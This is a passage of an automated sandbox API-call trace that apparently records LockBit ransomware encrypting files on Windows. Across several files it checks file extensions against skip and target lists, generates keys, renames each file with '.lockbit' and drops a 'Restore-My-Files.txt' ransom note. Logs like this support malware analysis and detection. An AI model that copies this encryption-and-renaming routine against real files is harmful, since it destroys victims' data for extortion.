lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0148.209] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187817.WMF") returned 1 [0148.210] lstrcmpiW (lpString1="ntldr", lpString2="J0187817.WMF") returned 1 [0148.210] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187817.WMF") returned 1 [0148.210] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187817.WMF") returned -1 [0148.210] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187817.WMF") returned -1 [0148.210] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187817.WMF") returned 1 [0148.210] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187817.WMF") returned -1 [0148.210] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0148.210] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187817.WMF") returned=".WMF" [0148.210] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0148.210] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0148.210] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0148.211] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0148.211] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0148.211] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0148.211] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0148.211] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187817.WMF.lockbit") returned 72 [0148.211] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187817.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187817.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0148.212] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0148.212] malloc (_Size=0x40068) returned 0x3df0008 [0148.212] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11644) returned 1 [0148.212] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0148.212] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.213] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0148.213] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.216] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187817.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187817.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0148.216] malloc (_Size=0xa6) returned 0x1fa2ed8 [0148.217] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0148.218] free (_Block=0x1fa2ed8) [0148.218] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187817.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0148.218] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0148.218] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0148.218] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2870, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187819.WMF", cAlternateFileName="")) returned 1 [0148.218] lstrcmpiW (lpString1=".", lpString2="J0187819.WMF") returned -1 [0148.218] lstrcmpiW (lpString1="..", lpString2="J0187819.WMF") returned -1 [0148.218] PathFindExtensionW (pszPath="J0187819.WMF") returned=".WMF" [0148.218] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0148.218] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0148.218] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0148.218] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0148.219] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0148.219] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187819.WMF") returned 1 [0148.220] lstrcmpiW (lpString1="ntldr", lpString2="J0187819.WMF") returned 1 [0148.220] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187819.WMF") returned 1 [0148.220] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187819.WMF") returned -1 [0148.220] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187819.WMF") returned -1 [0148.220] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187819.WMF") returned 1 [0148.220] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187819.WMF") returned -1 [0148.220] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0148.220] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187819.WMF") returned=".WMF" [0148.220] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0148.220] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0148.220] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0148.221] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0148.221] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187819.WMF.lockbit") returned 72 [0148.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187819.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187819.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0148.222] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0148.223] malloc (_Size=0x40068) returned 0x3df0008 [0148.223] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10352) returned 1 [0148.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0148.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0148.224] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187819.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187819.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0148.227] malloc (_Size=0xa6) returned 0x1fa2ed8 [0148.227] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0148.229] free (_Block=0x1fa2ed8) [0148.229] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187819.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0148.229] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0148.229] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0148.229] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1d4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187825.WMF", cAlternateFileName="")) returned 1 [0148.229] lstrcmpiW (lpString1=".", lpString2="J0187825.WMF") returned -1 [0148.229] lstrcmpiW (lpString1="..", lpString2="J0187825.WMF") returned -1 [0148.229] PathFindExtensionW (pszPath="J0187825.WMF") returned=".WMF" [0148.229] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0148.229] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0148.229] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0148.229] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0148.229] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0148.229] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0148.229] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0148.229] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0148.229] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0148.230] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0148.230] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187825.WMF") returned 1 [0148.231] lstrcmpiW (lpString1="ntldr", lpString2="J0187825.WMF") returned 1 [0148.231] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187825.WMF") returned 1 [0148.231] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187825.WMF") returned -1 [0148.231] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187825.WMF") returned -1 [0148.231] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187825.WMF") returned 1 [0148.231] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187825.WMF") returned -1 [0148.231] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0148.231] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187825.WMF") returned=".WMF" [0148.231] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0148.231] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0148.231] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0148.232] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0148.232] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187825.WMF.lockbit") returned 72 [0148.232] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187825.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187825.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0148.233] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0148.233] malloc (_Size=0x40068) returned 0x3df0008 [0148.233] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7500) returned 1 [0148.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0148.234] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0148.234] ReadFile (in: hFile=0x3cc, 